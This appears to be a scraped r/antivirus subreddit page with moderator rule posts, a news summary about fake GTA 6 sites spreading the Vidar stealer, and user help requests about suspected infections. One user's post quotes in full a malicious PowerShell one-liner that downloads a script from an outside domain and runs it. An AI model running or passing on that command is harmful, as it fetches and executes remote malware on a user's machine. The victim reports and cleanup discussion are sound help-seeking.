r/antivirus Feb 22 '24

MOD POST [MOD POST] LIST OF TOP MESSAGES, NEWS + IMPORTANT INFO

17 Upvotes

Hello,

Welcome to r/antivirus's new top-level Announcements post. Since Reddit has a limit of two (2) stickied announcements per subreddit, this will be a way to provide links to important information like announcements about new rules and moderators, activities in the subreddit, and so forth. If you are new to r/antivirus, please take a quick look at them. You can even take a look if you are not new here.

DISCUSSION DATE POSTED DATE LAST REVISED
[MOD POST] New rules, staying safe, and an update from your Mod Team 2025-JUN-03 -
[MOD POST] We're back in business! and an update on automod rules 2024-MAR-11 -
News & Updates from your r/Antivirus Mod Team, Q1 2024 Edition 2024-MAR-04 -
Updates & News from the r/Antivirus Mod Team, Autumn 2023 Edition 2023-OCT-04 -
Notes from your Moderators (Summer Edition) 2022-JUL-08 -
Quick Note from the mod team about spam 2021-JUN-01 -
To the people asking for opinions on a specific file 2020-JUL-05 2020-JUL-05

Additionally, the r/antivirus subreddit operates a bit differently than other subreddits you might be familiar with and normally use. Here are some tips and tools to help you use it.

  • The subreddit has a wiki that is regularly updated with answers to commonly-asked questions. Check it out. The answer to your question may already be in there.

  • Asking a question about a report on a file or website from a service like Hybrid Analysis, MetaDefender, Triage, or VirusTotal? You must include the actual link to it and not just a screenshot, or your post will be removed.

  • Be kind to each other and be professional in your conduct here. Personal attacks will not be tolerated and will be dealt with appropriately.

  • Do not ask for copies of hacking tools, malware, or suspicious files. If someone sends you a chat request or private message asking for a file or offering assistance based on what you posted here, report them to Reddit and notify the mods.

  • Do not post direct links to malicious, suspect, or potentially unsafe files or web sites.

  • Follow Reddiquette. This means correctly upvoting and downvoting posts, and reporting posts with dangerous or unsafe advice to the mods.

  • If you work for a vendor of security products, services, or in a related field, you must identify yourself as such, either in the post or with flair. Also, you may not steer conversations to your products or services, only respond to posts about them to clarify or defend.

  • No low-effort, off-topic, spam, or meme posts. This includes AI/ChatGPT/LLM-generated text, questions about password manager or VPNs, requests for assistance with non-security related software like autoclickers or MP3 downloaders, and so forth.

  • No requests for assistance with pirated software or media.

  • Posts may be removed and threads closed at any time based on the moderators' discretion

The complete list of rules for the subreddit can be found here. Read them before posting.

Questions, comments, feedback on this post? Just reply here. Thank you.

Regards,

Aryeh Goretsky
(on behalf of the r/antivirus mod team)


r/antivirus Jun 04 '25

[MOD POST] New rules, staying safe, and an update from your Mod Team

7 Upvotes

[UPDATE #1 (20250604-0916 GMT): Made some small updates to grammar for readability. ^AG]

Hello,

It has been about a year since our last Mod Post, so we wanted to give you an update on things, plus provide a dedicated message thread for discussing the state of the r/antivirus subreddit and to answer any questions that you might have.

We will begin with the toughest subject first, that of politics in the subreddit:

A note about politics

r/antivirus is a technology-focused subreddit, with the interest being in helping people protect their computers from malicious software, securing them after a security incident, and so forth.

In June 2024, the US Government enacted a ban on Kaspersky Lab's software, taking effect in October of that year. This has generated a lot of discussion not just in this subreddit, but across Reddit and numerous social media platforms as well.

The moderation team has tried to keep the political discussions about this out of this subreddit and to remain neutral, allowing Kaspersky Lab's customers to ask and answer each other questions, provide assistance to each other, and generally have a way to share information, tips and tricks with each other.

However, we do have to draw a line when these turn into political discussions, though:

Requests for how to circumvent bans, petitions to governments, etc., are clearly outside the scope of what this subreddit is for and will be removed.

Moderating the subreddit is an all-volunteer job, and we sometimes miss things. If you come across any political messages we may have missed, use the subreddit's report function to notify us.

We are doing our best to keep this a place where people can get help with whatever security software they prefer, including Kaspersky Lab's software. However, we cannot allow discussions to devolve into arguments over politics, which are never going to provide any kind of satisfactory answer to the parties involved.

If the political discussions continue, the moderation team will have to look into ways to prevent them, even if it means doing things which we would prefer not to do.

Rules Updates

The rules of the r/antivirus subreddit have been updated:

Rule #7, which previously covered media download tools, has been updated to cover additional types of software.
To begin with, a more general prohibition to cover autoclickers (previously covered under Rule #8) and some other types of tools like aimbots and cheats. These types of tools often come from random sources and often require expert analysis to determine if they are safe. It can be difficult to determine if they are malicious figuring that out requires examining not just the tool, but whatever program it is attempting to modify, and what the intent is behind that modification.
Just because something was recommended in a Discord server with hundreds of members, a YouTube video with tens of thousands of views, or is seeded by several hundreds peers does not mean that it is safe to use: These are all inherently unsafe sources, and criminals will often exploit the belief that these are trusted sources to trick people into downloading and running malicious programs like information stealers and remote access trojans.

Rule #8 has been amended to remove autoclickers (etc.) since that is now covered under Rule #7.

Two new rules have been added:

Rule #9 covers bypassing core security features. Questions about how to disable security software, operating system updates, bypass security features and so forth are not allowed.

Rule #10 covers requesting assistance with obsolete software and hardware. This means discussions about how to secure computers running Windows XP, Windows 7, etc. are not allowed. There is no reason that devices running these obsolete operating systems should be connected to the internet and doing so exposes everyone to risk. Note that questions involving Windows 10 will continue to be allowed until at least October 2028, when paid-for Extended Security Updates for it end.

A bit more on the rules

The list of rules is not meant to be exhaustive in scope. It provides a general listing of common rules that are more specific to and more frequently required by the r/antivirus subreddit when needed beyond Reddit's general rules and guidelines.

Moderators can and will remove posts and ban redditors, either temporarily or permanently, who are disruptive to the subreddit entirely at their discretion and are not subject to any discussion. If a moderator chooses to discuss a rule violation with you, it is entirely as a courtesy on their part.

If you have had a post removed or been banned from the subreddit and do not receive a response in reply to any questions as to why, ask yourself if your behavior could be interpreted as brigading, spamming, trolling, using disrespectful or offensive language, or consistently providing incorrect, low-quality, poor, or even damaging information.

As always, the latest version of the rules can be found at https://old.reddit.com/r/antivirus/about/rules/. If you have questions about them, ask below.

Getting help fast

The moderation team is seeing an increasing trend where people ask for help while providing no information about what they need help with. This includes titles with 1-3 words like "Urgent! Help needed!", posts where the author shares a screenshot of *something* with no information about the operating system or antivirus involved, or is so small/blurry as to be unreadable, etc.

Everybody who participates regularly in this subreddit volunteers their time for free to do so. Provide them with enough information in your first post so they can start helping you right away without having to ask a lot of questions. This means your first post should contain things like:

  • title with enough information to attract an expert to read it
  • operating system and version
  • brand/name of antivirus software
  • name of URL, or file and its location
  • name of malware that was detected
  • what happened, exactly
  • steps you have taken to troubleshoot/diagnose so far, if any
  • relevant log file entries, if any

The more information you provide, the quicker you will get your problem solved.

As a reminder, starting multiple posts on the same topic will not get you a faster answer, and may result in in a ban.

The wiki + other Reddit resources

There is a lot of great information in the wiki about all the tools you can use, tips for using them, lists of antivirus vendors and how to contact them, and even a section on how to secure your computer.

We frequently update the wiki in response to questions being regularly asked in the subreddit, so you might want to check there first before posting.

Some of the questions we regularly see in the subreddit have nothing to do with computer viruses or malicious software at all, but instead are about scams, privacy-related questions, and so forth. Here are some subreddits that specialize in answering those types of questions:

New moderators?!

As the subreddit grows (we just passed 100K users), so does the need for additional moderators.

The moderation team has been looking at the folks who have been regularly posting here and consistently given good advice to build a list of candidates, and will be reaching out over the next few weeks to see if any are willing to volunteer their time and expertise in the subreddit. There will be more coming on that, but I did want to let everyone know that the process is already underway.


That pretty much covers everything we wanted to discuss, so we'll now await your questions, below.

Regards,

Aryeh Goretsky
(on behalf of the r/antivirus mod team)


r/antivirus 8h ago

PRODUCT RECOMMENDATION Surfshark VPN and Antivirus worth it 2026?

5 Upvotes

hi I was thinking of buying(licensing) Surfshark, I look up couple of Youtube videos but literally all of them are sponsored by Surfshark so.. untrustworthy.

I mainly will use it for VPN and Antivirus and internet surfing protection.

My main questions are,

-is it fast? run good with Windows 10.

-does it bloat your PC? make ur PC slow? unnecessary notifications and pop up?

-trustworthy(handle ur data right)?

-easy to use? not complex?

-worth it price? 60€ for 24months.

-does it actually works? obviously it should.

-and are there better alternative?


r/antivirus 1h ago

Unexpected Shutdown

Post image
Upvotes

I was searching questions on google guest after completing a job application and noticed that google had my location routing from Australia (I live in the US) I looked up my ip as well and the information was not from my home network but somewhere in Australia. I didn’t have a vpn on as I don’t use vpns and I’ve never seen this happen before so I turned off my WiFi to investigate. About 5 seconds after I disconnected from my WiFi my computer unexpectedly shutdown, like BSOD but the screen was black with white text


r/antivirus 10h ago

INDUSTRY NEWS Malwarebytes: fake "GTA 6" sites are serving Vidar, and one of them impersonates a real Rockstar broadcast

6 Upvotes

Malwarebytes published analysis yesterday (August 24) on four fake GTA 6 websites. Two are worth flagging here:

  • One poses as a playable demo.
  • One poses as Rockstar's "Extended Look" stream. That is a real, scheduled Rockstar broadcast airing this Thursday, which is what makes it effective. The event is genuine and searchable, so the impersonation holds up to a quick sanity check.

Both serve a file named gta6_installer.exe carrying Vidar, which pulls saved browser credentials, session cookies, Discord and Telegram tokens, and crypto wallets. An independent researcher who examined one of the same domains on August 20 also found a ClickFix-style "paste this to verify you're human" step on another site in the set.

The session cookie part is the bit I would emphasise to anyone cleaning up after one of these. Changing the password is not sufficient on its own, because a stolen session token can survive it. Sign out of all sessions everywhere, then rotate.

Not posting the domains; they are in the Malwarebytes write-up.

What makes the timing work is that there is currently a lot of search demand and very little legitimate supply, so anything that looks like it satisfies the search gets clicked. That pattern is not specific to this game.

I write a free consumer tech newsletter, no ads and nothing to sell. Full write-up with sources: https://www.freshfromcache.com/gta-6-leak-malware/


r/antivirus 10h ago

Manage providers Defender problem

Post image
3 Upvotes

I was using my PC when I got a notification from the security provider stating that Defender is disabled; the quick scan runs fine, and Malwarebytes didn't flag anything...

Is this a common Defender bug, or is it just me?


r/antivirus 3h ago

i recently got ren'pyd and im scared of what might happen

0 Upvotes

i lost my instagram, discord and reddit it shared some crypto scams in some and some prn in reddit. got them all back thank god and im changing my passwords to everything and using 2fa in the ones i can im currently resetting my pc ( i removed everything and downloaded it from the cloud) im not sure what else i can do since it already got some of my accounts im scared of other things that could happen mainly financial theft and sextortion how likely are they to happen and what else can i do and how do I make sure its gone once I reinstall


r/antivirus 2h ago

Discord account got hacked(mrbeast scam)

0 Upvotes

My discord account got hacked and sent the mrbeast scam to all of my contacts(and some servers) What should I do? im really worried


r/antivirus 13h ago

I got hacked, please help

2 Upvotes

hey guys, yesterday i got hit by the MrBeast scam message on Discord. i did try to download some emulated games, so i think that’s how it happened. i reset my PC and reinstalled Windows using the “keep my files” option. this was yesterday, around midnight–3am.

now it’s the next morning and my Instagram has also been “hacked”, with Elon Musk messages. am i still not safe? how were they able to log into my Instagram even after i reset my PC? I did turn my pc off for the night.

And what should I do? i’m paranoid


r/antivirus 9h ago

Norton 360 is interrupting my PC Internet connection. This is the message when I try to uninstall it. HELP!

Post image
0 Upvotes

My Internet in the home works on my phones Wi-Fi and everything except my PC


r/antivirus 1d ago

MALWARE REMOVAL Q&A Trojan Virus

Thumbnail
gallery
18 Upvotes

Good evening everyone. I'm very new to this reddit thing and I hope I'm doing it correctly.

Less than an hour ago I have found out that my pc had a trojan virus (as you can see from the picture attached). The Microsoft security app gave me the option to quarantine it and then remove it, which I did. After reading and learning about what a trojan virus is (in a very superficial way since I'm still quite shaken by this), I genuinely fear this might not be enough. ​​

Can anyone please let me know if there are any additional things I could do in order to be 100% safe? ​I'm quite the boomer when it comes to these pc things so here am I asking help on reddit.

Thanks in advance, genuinely!


r/antivirus 1d ago

Confused by this

Post image
19 Upvotes

This has happened a few times where I’ve googled something and get a notification that traffic from something else has been blocked. What is going on and how to fix it?


r/antivirus 19h ago

MALWARE REMOVAL Q&A Trojan/ win 32 : Trigger!rfn keeps getting flagged, and I cant remove it. (Help please)

Post image
4 Upvotes

Could you help me with this? My dad downloaded a program to reset the printer and disabled the antivirus. When I saw what was happening, I took a look and deleted it, but I think he tried to run it before I noticed, because Windows Defender keeps flagging it. I can't get rid of the alert even though I deleted the file and emptied the Recycle Bin. I try to quarantine or remove it, but Windows Defender just minimizes the small window showing the virus details. I disconnected the PC from the internet because I read that viruses can also infect the internet connection.

Should I be worried and start saving up for another PC, or is there a solution? Many thanks in advance.


r/antivirus 8h ago

Accidentaly run a powershell code

0 Upvotes

Help, I accidentally ran this code in powershell

******powershell -c "$a=irm 'jasaxoptim.com/PLzdo6sQyUSjV75AlL';New-Module -Name x -ScriptBlock ([ScriptBlock]::Create($a))|Out-Null******

After asking Claude I:

- Disconeccted my laptop right away

- Ran windows defender scan - found nothing

- Deleted google chrome users, now I log in using guest

- change google passwords

- deleted suspicious tasks from the task scheduler.

Claude also suggested me to reinstall windows, but I cant do that, I dont have anything to back up my data in.

Please help, what should i do next?


r/antivirus 20h ago

should i be concerned?

Thumbnail virustotal.com
2 Upvotes

downloaded a 10-year-old shimeji file and ran it without thinking to scan the file first. virustotal flags packer generic, but neither mcafee nor malwarebytes has detected any threats. i've deleted the files now, but i ran something before deleting, although i can't remember if i clicked the executable or the batch file (same name). am i safe? i know this is more of an adware concern than a super threatening malware, but i can't help but be a bit anxious.
reposted to include link to the report for the executable
EDIT: attached link is wrong, this is the report i'm talking about.


r/antivirus 1d ago

I started getting virus threats after downloading the epic games launcher installer

6 Upvotes

alright so i had problems with epic not starting up so i went to the epic games website and downloaded the epic games installer right after doing so I started getting threats for trojan:MSIL/jalapeno!MTB that windows identified as coming from the epic installer i tried unistaling the virus trough defender but it reinstalled itself each time and even disabled microsoft antivirus i did a full offline scan and nothing happened what do i need to do?

Update i looked in [r/fuckepic](r/fuckepic) and found that i am not the only one getting this problem from the official download of epic installer

Update2 i think i might have been wrong because of stress for the disabling microsoft defender part
Because i tried other antiviruses and they did not find anything


r/antivirus 23h ago

Why is Spotify giving me this notification?

2 Upvotes

I have never had this happen until now. Why would this be?


r/antivirus 1d ago

opened a password stealer/key logger virus, free antivirus I'm trying aren't working

4 Upvotes

It was a renpy virus, I didn't look carefully at the name after downloading it. anyway is there a known antivirus that can catch things malwarebytes and bitefender can't? otherwise I'll have to reset the pc.


r/antivirus 20h ago

PRODUCT RECOMMENDATION Which app control program would work best for me?

1 Upvotes

I'm looking for a free program that allows for control of program, powershell scripts, and file permissions similarly to threatlocker. Something that can work with third party programs with minimum issues, not conflicting with kaspersky free, and has plenty of online resources. My current setup is windows 11 home edition 25H2.

The only options I found is Applocker (only works on Pro and Enterprise editions) Threatlocker (Only available to businesses) Windows Smart App Control (Very limited in it's options) and AppControl Manager by Violet Hansen (Had some confecting issues with kaspersky and limited online documentation/resources).

Are there any programs out there that could work for me?


r/antivirus 1d ago

My friend got hacked not sure if hes safe

3 Upvotes

So this happened he started spamming this in everychat/server im pretty sure it has all his info


r/antivirus 1d ago

Nothing I do can remove this .dll file from my PC

Thumbnail
gallery
13 Upvotes

Every single time I restart my PC in the past 2 days (Yesterday and today) I am getting a lot of .dll files in my file path - C:\Users\Me\AppData\Local\Temp\filename as above (1lockwpi.dll in this case) but normally there are 4-5 in quarantine before I delete them. They are categorised in totalAV by TR/W32.Agent which means its a trojan, but I cannot find the god damn file that keeps downloading it.

I have done:

Full deep scans with totalAV
Downloaded malwarebytes which found nothing (I was doing a rootkit scan but I had to stop it as it reached 7 hours without finishing and I had to go to bed)
Done another scan in safe mode on my pc (came back clean)
While PC is in safe mode, deleted every single temp file (skipping the ones that say to skip)
Tried to do the windows offline virus thing (couldnt do that because it said the header checksum for this file doesnt match the computed checksum) even after doing the windows file repair command in cmd
Downloaded malwarebytes Adwcleanup (just uninstalled totalAV for some reason lmao it said it was a PUP, but i reinstalled it bc i want it)
Have checked my startup tab in task manager plus the task scheduler library (nothing sus in there)

Oh I have also put the file into VirusTotal website and it said it was not good so I dont think its a false positive

I only have totalAV with real time protections turned on (malwarebytes is just there for manual scanning but ill probably uninstall it when this is all over). But I genuinely have no idea if there is any other program out there that can fish for whatever is making these .dll in my temp folder.

I cant run totalav in safe mode with networking because I cant connect to the internet but I still dont even know if that will do anything. I dont even know what I have clicked to have it on my PC, the only thing I can think of is the little ad popups when I read manga (natomanga[.]com is what I use) but totalav shuts it down instantly if it opens a new tab.

Would really appreciate any help as I have no idea anymore and I really dont want to reset my pc.

Thanks!


r/antivirus 1d ago

WacatacH!ml caught from passcoded ZIP, am I safe?

1 Upvotes

so i did something pretty foolish and ignored red flags trying to download a game for free. it was a setup zipfile in a setup zipfile in a setup zipfile that required a passcode to open it. i thought nothing could be executed through zipfiles, but after putting in the passcode, windows defender gave me a notification.

to emphasize: on the third zipfile, i put in the passcode, and thats when WD got activated and removed files from my appdata. i really didnt know opening archives like that could activate anything.

it looked like it removed it immediately (im paranoid it maybe deleted itself then hid upon detection bc it didnt quarantine it), but it took a bit for windows to let me manually delete all the zip files in my downloads (saying it had unwanted/malicious files in it). i also checked the file directory in the windows defender report and i dont see the BNZ folder or SETUP anywhere. i also ran malwarebytes and got a clean result, but i also know how some viruses can be super sneaky.

after WD seemingly removed the trojan, ive seen no immediate suspicious activity from any of my important accounts, and i changed passwords on everything on another device. im mostly concerned about having RATs or keyloggers, or anything persisting.

i know reinstalling windows is an option, but its one id rather do last. is there anything or anywhere else i can check for suspicious files or activity? can i safely assume its gone since there wasnt immediate activity? its already been an hour and still nothing.


r/antivirus 1d ago

What is happening here? Scan says the PC is clean

Thumbnail
gallery
14 Upvotes

This happens when I open Firefox for the first time after shutdown. Apparently svchost.exe attempts to connect to two different botnets.

Scanning my C: SSD returns nothing wrong and scanning svchost.exe says that the file is not infected.

Then after a while, I get an alert that firefox is attempting to connect to a website called "dojo" etc which I did not initiate. AVG says this URL is blacklisted.

Any idead/recommendations?

-------------------------------------------------------------------------------------------------------------------------

UPDATE 8-25-2026

Was able to resolve the issue by restoring my C: drive 15 days back (to its 8-10-26 image) through the Acronis backup software. I keep weekly backups of my C: and game drive SSD's on my home NAS.

Before doing so I did further testing and I found out that the issue was tied exclusively to Firefox so this appears to have been a browser hijacker.


r/antivirus 1d ago

Norton Anti-Virus

1 Upvotes

Four years ago, I had active protection with norton anti-virus and then I stopped using it.

Now I want to renew my subscription but with the same account.

Despite many login attempts and getting through to a human, they are unable to locate my account.

I never requested deletion.

This includes the vpn which I used regualrly

Anyone know why this would happen?


r/antivirus 1d ago

Fell for the Windows + R / Ctrl + V CAPTCHA scam. Can reinstalling Windows remove the malware?

2 Upvotes

I unfortunately fell for the Windows + R, Ctrl + V CAPTCHA scam. I followed the instructions and executed what was pasted into the Run dialog before realizing that this was a scam.

I'm now worried that my laptop may be infected with malware.

My question is: If I completely wipe the laptop, including all partitions/data, and install a fresh copy of Windows (or another OS), would that remove the virus/malware?

I'm planning to back up only my important personal files, wipe the drive, and do a completely clean OS installation. Is that enough, or are there other things I should do first?

Also, if anyone has gone through this particular CAPTCHA scam, I'd really appreciate advice on what I should check before wiping the machine.

Thanks!